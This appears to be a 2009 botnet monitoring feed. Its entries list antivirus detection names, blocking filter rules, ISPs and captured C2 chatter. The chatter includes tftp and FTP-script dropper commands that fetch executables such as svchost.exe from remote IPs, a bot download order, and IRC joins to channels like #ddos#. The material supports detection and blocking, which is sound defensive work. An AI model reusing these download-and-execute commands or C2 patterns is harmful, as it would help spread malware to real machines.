  • Client: USERHOST P|jsmmnebfrMODE P|jsmmnebfr JOIN #mm RSA
  • Server: :hub.4668.net 302 P|jsmmnebfr...

BotClient Antivirus Diagnoses
AhnLab-V3: Kolabc.141454.K
AntiVir: TRDropper.Gen
Authentium: Threat-HLLIYE!Eldorado
Avast: _DCom-F
AVG: Heur
BitDefender: Packer.Yoda.A
CAT-QuickHeal: I-Kolabc.gmv
ClamAV: MISSED
DrWeb: HLLW.Piabot.3
eSafe: TRDropper
eTrust-Vet: Sdbot.NJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: Threat-HLLIYE!Eldorado
F-Secure: Kolabc.gmv
Ikarus: Kolabc
Kaspersky: Kolabc.gmv
McAfee: Generic.dx!bz
Microsoft: Kolabc.C
NOD32v2: MISSED
Norman: Smalltroj.NVNC
Panda: Gaobot.OXI.worm
Prevx1: MISSED
Rising: MS06-040.f
Sophos: MalPacker
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: Kolabc.gmv
TrendMicro: TROJ_LSADCOM.MCL
VBA32: Kolabc.gmv
VirusBuster: Rbot.AKMS
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 3305 | Filter: deny ip host 217.18.77.190 any log ! 2 infects 08/03/09 to 08/03/09 | axoft.nl | ISP: qweb
Clients 2 (netherlands) | Activity Domain: axoft.nl
Chatter Example
  • Server: echo open 130.13.164.110 40102 >> asr_plmye &echo user plmyen...
  • Client: USER plmyen
  • Client: PASS plmyen
  • Client: open 130.13.164.110 40102 220user plmyen plmyen 331
  • Server: RETR asr_68418.exe
  • Server: echo open 130.13.164.110 40102 >> asr_fscuf &echo user fscufu...
  • Client: USER fscufu
  • Client: PASS fscufu
  • Client: PASS secretpass
  • Client: NICK P|b83hbs1b6USER mg28508k3 * 0 :USA|2K|053
  • Server: :hub.11433.net 001 P|b83hbs1b6...
  • Client: USERHOST P|b83hbs1b6
  • Client: USERHOST P|b83hbs1b6MODE P|b83hbs1b6 JOIN #mm RSA
  • Server: :hub.11433.net 302 P|b83hbs1b6...
  • Server: PING :hub.11433.net
  • Server: PONG hub.11433.net
  • Server: PING :hub.11433.net
  • Server: PONG hub.11433.net

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.AOLW
BitDefender: Generic.Mydoom.F72197F1
CAT-QuickHeal: Agent.gen
ClamAV: MISSED
DrWeb: HLLW.Piabot.origin
eSafe: MISSED
eTrust-Vet: IRCBot.PJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Exploit.MS06040
Kaspersky: Kolabc.gza
McAfee: Spybot.worm!l
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Atraps.MQB
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalBehav-004
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: SPYBOT.BIM
VBA32: MISSED
VirusBuster: RBot.Gen.3
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 65520 | Filter: deny ip host 193.104.94.11 any log ! 2 infects 11/05/09 to 11/05/09 | ipaper.com | ISP: block for pi assignments
Clients 2 (united kingdom) | Activity Domain: ipaper.com
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 118.221.35.162 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 118.221.35.162 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK biymeivyUSER p020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG biymeivy :!get http:/sleepatnight.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRDldr.Agent.LF
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Inject.6445
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Krap.AH
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Packed.Krap
Kaspersky: Packed.Krap.ah
McAfee: MISSED
Microsoft: VirTool_Obfuscator.HG
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: Packed.Generic.258
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 2569 3938 | Filter: deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 | internetserviceteam.com | ISP: netdirekt e.k
Clients 2 (germany) | Activity Domain: internetserviceteam.com
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 113.253.112.208 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 113.253.112.208 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
  • Client: NICK tiHIjEan
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your...
  • Client: MODE tiHIjEan +xi
  • Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
  • Client: JOIN ##russia## USERHOST tiHIjEan
  • Client: MODE ##russia## +smntu
  • Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: Palevo.jur.20
Authentium: MISSED
Avast: _Trojan-gen
AVG: Dropper.Generic.AYVO
BitDefender: Generic.2518038
CAT-QuickHeal: Agent.ATV
ClamAV: MISSED
DrWeb: IRC.Sdbot.5190
eSafe: TrojanProxyRan
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Pushbot
Kaspersky: P2P-Palevo.jur
McAfee: Autorun.aah
Microsoft: Malagent
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: IRCBot
TheHacker: MISSED
TrendMicro: TROJ_AGENT.ICZZ
VBA32: Kolab.ear
VirusBuster: P2P.Palevo.EAN
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 3305 | Filter: deny ip host 212.54.2.171 any log ! 1 infects 10/30/09 to 10/30/09 | megabaud.fi | ISP: elisa oyj
Clients 1 (finland) | Activity Domain: megabaud.fi
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 202.157.56.125 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 202.157.56.125 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
  • Server: :hub.35869.net 001 P|nold11864...
  • Client: USERHOST P|nold11864
  • Server: :hub.35869.net 302 P|nold11864...
  • Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: TRDropper.Gen
Authentium: Threat-HLLIYE!Eldorado
Avast: _DCom-F
AVG: Heur
BitDefender: Packer.Yoda.A
CAT-QuickHeal: IRCBot.idc
ClamAV: MISSED
DrWeb: HLLW.Piabot
eSafe: TRDropper
eTrust-Vet: IRCBot.KU
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: Threat-HLLIYE!Eldorado
F-Secure: IRCBot.idc
Ikarus: Exploit.MS06040
Kaspersky: IRCBot.idc
McAfee: MISSED
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Smalltroj.MTNE
Panda: Gaobot.OXI.worm
Prevx1: MISSED
Rising: MS06-040.b
Sophos: MalPacker
Sunbelt: Wootbot.gen
Symantec: Spybot.Worm
TheHacker: BackdoorIRCBot.idc
TrendMicro: TROJ_LSADCOM.MCL
VBA32: Kolabc.gco
VirusBuster: IRCBot.AAWX
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 6669 | Filter: deny ip host 93.156.203.49 any log ! 1 infects 07/16/09 to 07/16/09 | cm-93-156-61-10.telecable.es | ISP: telecable
Clients 1 (spain) | Activity Domain: cm-93-156-61-10.telecable.es
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR javaflash.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|5502108USER veitija 0 0 :USA|5502108
  • Server: :fart.bitchassness.shit NOTICE USA|5502108 :*** If you are having...
  • Server: PONG :C5777CD6
  • Client: JOIN ##!cyber whores
  • Client: USERHOST USA|5502108MODE USA|5502108 +xiJOIN ##!cyber...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: _Virtob
AVG: Virut
BitDefender: Virtob.8.Gen
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: Poison.686
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Virut.av
Ikarus: Virut.av
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 3305 | Filter: deny ip host 62.128.152.250 any log ! 1 infects 08/03/09 to 08/03/09 | calnea.com | ISP: _ netbenefit dedicated servers sovereign house_
Clients 1 (united kingdom) | Activity Domain: calnea.com
Chatter Example
  • Client: USER xxcupq
  • Server: echo open 130.15.63.51 54236 >> asr_xxcup &echo user xxcupq...
  • Client: PASS xxcupq
  • Client: user xxcupq xxcupq 331230
  • Server: RETR asr_41061.exe
  • Client: PASS secretpass
  • Client: NICK P|qvb4xgt76USER eek6x2dlg * 0 :USA|XP|058
  • Server: :hub.58835.net 001 P|qvb4xgt76...
  • Client: USERHOST P|qvb4xgt76
  • Server: :hub.58835.net 302 P|qvb4xgt76...
  • Client: USERHOST P|qvb4xgt76MODE P|qvb4xgt76 JOIN #mm RSA
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.AOLW
BitDefender: Generic.Mydoom.F72197F1
CAT-QuickHeal: Agent.gen
ClamAV: MISSED
DrWeb: HLLW.Piabot.origin
eSafe: MISSED
eTrust-Vet: IRCBot.PJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Exploit.MS06040
Kaspersky: Kolabc.gza
McAfee: Spybot.worm!l
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Atraps.MQB
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalBehav-004
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: SPYBOT.BIM
VBA32: MISSED
VirusBuster: RBot.Gen.3
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 7575 | Filter: deny ip host 218.10.16.78 any log ! 1 infects 07/01/09 to 07/01/09 | - | ISP: china unicom heilongjiang province network
Clients 1 (china) | Activity Domain: -
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 113.252.244.40 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 113.252.244.40 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 113.252.244.40 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER ziucwj ziucwj ziucwj :jrmsiaivxwuejgkz
  • Client: NICK knCcrgnd
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your...
  • Server: Ccrgnd :MOTD File is missing:knCcrgnd MODE knCcrgnd :+iwx
  • Client: MODE knCcrgnd +xi
  • Client: JOIN ##russia## USERHOST knCcrgnd
  • Client: MODE ##russia## +smntu
  • Client: GET /datafinal.exe HTTP/1.0Host: hi5-gallerys.com
  • Server: GET /nas.exe HTTP/1.0Host: 220.196.42.160

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: IRC.Sdbot.4924
eSafe: MISSED
eTrust-Vet: Slenfbot!generic
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: IRCBot.kzu
Ikarus: MISSED
Kaspersky: IRCBot.kzu
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 18067 | Filter: deny ip host 123.164.66.62 any log ! 1 infects 06/30/09 to 06/30/09 | 163data.com.cn | ISP: chinanet heilongjiang province network
Clients 1 (china) | Activity Domain: 163data.com.cn
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK l5-000cf7d3
  • Client: PoNG :B5467810
  • Server: :a 001 l5-000cf7d3 :l5-000cf7d3 MODE l5-000cf7d3 :+i
  • Client: USeRHOST l5-000cf7d3
  • Client: JOiN #l5t3 dlrowymx0ri
  • Server: :l5-000cf7d3!l@192.168.1.128 JOIN :#l5t3

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 6667 | Filter: deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 | cogentco.com | ISP: psinet inc
Clients 1 (united states) | Activity Domain: cogentco.com
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
  • Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314

BotClient Antivirus Diagnoses
AhnLab-V3: Parite
AntiVir: Parite
Authentium: Korgo.V
Avast: _Parite
AVG: Korgo.A
BitDefender: Padobot.BV.Dam
CAT-QuickHeal: Perite.B
ClamAV: Padobot.M
DrWeb: Lsabot
eSafe: _Parite_B
eTrust-Vet: Pinfi.A
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Parite.B
F-Prot: Korgo.V
F-Secure: Padobot.BV.Dam
Ikarus: Padobot.M
Kaspersky: Padobot.m
McAfee: Pate.b
Microsoft: Korgo.V
NOD32v2: MISSED
Norman: Korgo.V
Panda: Korgo.U.worm
Prevx1: MISSED
Rising: Parite.b
Sophos: Parite-B
Sunbelt: MISSED
Symantec: Pinfi
TheHacker: Pate.B
TrendMicro: PE_PARITE.A
VBA32: Parite.B
VirusBuster: Padobot.D
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 3308 | Filter: deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 | nebula.fi | ISP: nebula oy. web hosting pri-dns and streaming
Clients 1 (finland) | Activity Domain: nebula.fi
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 125.4.228.60 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 125.4.228.60 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
  • Server: :hub.82.net 001 P|m80s5khyj...
  • Client: USERHOST P|m80s5khyj
  • Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
  • Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: _Virtob
AVG: Virut
BitDefender: Virtob.8.Gen
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: Virut.30
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Virut.av
Ikarus: Kolabc
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 5555 | Filter: deny ip host 200.204.157.111 any log ! 1 infects 07/11/09 to 07/11/09 | sterlingstudents.net | ISP: comite gestor da internet no brasil
Clients 1 (brazil) | Activity Domain: sterlingstudents.net
Chatter Example
  • Client: NICK USA|3073090USER fpybefnye 0 0 :USA|3073090
  • Server: :HTTP1.4 NOTICE AUTH :*** eh...
  • Server: :HTTP1.4 001 USA|3073090 :HTTP1.4 002 USA|3073090 :HTTP1.4 003...
  • Client: USERHOST USA|3073090
  • Client: MODE USA|3073090 -x+iJOIN #ddos# drenyUSERHOST USA|3073090MODE...
  • Server: :USA|3073090!fpybefnye@192.168.1.150 JOIN :#ddos#:HTTP1.4 332...
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 1 | TCP Ports 80 216 | Filter: deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 | jws.com | ISP: godaddy.com inc
Clients 1 (united states) | Activity Domain: jws.com
Chatter Example
  • Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 12394_upload.exe
  • Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
  • Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
  • Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
  • Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
  • Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
  • Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
  • Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
  • Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...

BotClient Antivirus Diagnoses
  AhnLab-V3           Kashu.B
  AntiVir             Sality.Y
  Authentium          Sasser.E
  Avast               _Sality
  AVG                 I-Sasser.E
  BitDefender         Generic.24440
  CAT-QuickHeal       Sality.R
  ClamAV              Sasser.H
  DrWeb               Sector.5
  eSafe               MISSED
  eTrust-Vet          Sality.AA
  Ewido               MISSED
  FileAdvisor         MISSED
  Fortinet            Sality.AA
  F-Prot              Sasser.E
  F-Secure            Sasser.D
  Ikarus              Email-Plexus.E
  Kaspersky           Sality.aa
  McAfee              Sality.gen
  Microsoft           Sality.AM
  NOD32v2             MISSED
  Norman              Sasser.E
  Panda               Sasser.E.worm
  Prevx1              MISSED
  Rising              KUKU.GEN
  Sophos              Sality-AM
  Sunbelt             MISSED
  Symantec            Sality.AE
  TheHacker           Sality.gen
  TrendMicro          PE_SALITY.EN
  VBA32               Sality.kaka
  VirusBuster         Sasser.E
  Webwasher Gateway   MISSED
Priority: 1
TCP Ports: 80
Filter: deny ip host 194.67.57.20 any log !
Infects: 1 (09/03/09 to 09/03/09)
Domain: mail.ru
ISP: sovintel-msk-netbridge-ervices-net
Clients 1 russian federation Activity Domain mail.ru
Chatter Example
  • Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
  • Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...

BotClient Antivirus Diagnoses
  AhnLab-V3           MISSED
  AntiVir             TRDropper.Gen
  Authentium          Heuristic-MUP!Eldorado
  Avast               _Padobot-D@UPX
  AVG                 MISSED
  BitDefender         Generic.69904
  CAT-QuickHeal       MISSED
  ClamAV              MISSED
  DrWeb               MISSED
  eSafe               WormPoxdar.A.D
  eTrust-Vet          MISSED
  Ewido               MISSED
  FileAdvisor         MISSED
  Fortinet            MISSED
  F-Prot              Heuristic-MUP!Eldorado
  F-Secure            MISSED
  Ikarus              MISSED
  Kaspersky           MISSED
  McAfee              MISSED
  Microsoft           Poxdar.A
  NOD32v2             MISSED
  Norman              MISSED
  Panda               MISSED
  Prevx1              MISSED
  Rising              MISSED
  Sophos              MalHckPk-E
  Sunbelt             MISSED
  Symantec            Poxdar
  TheHacker           MISSED
  TrendMicro          PAK_Generic.001
  VBA32               MISSED
  VirusBuster         MISSED
  Webwasher Gateway   MISSED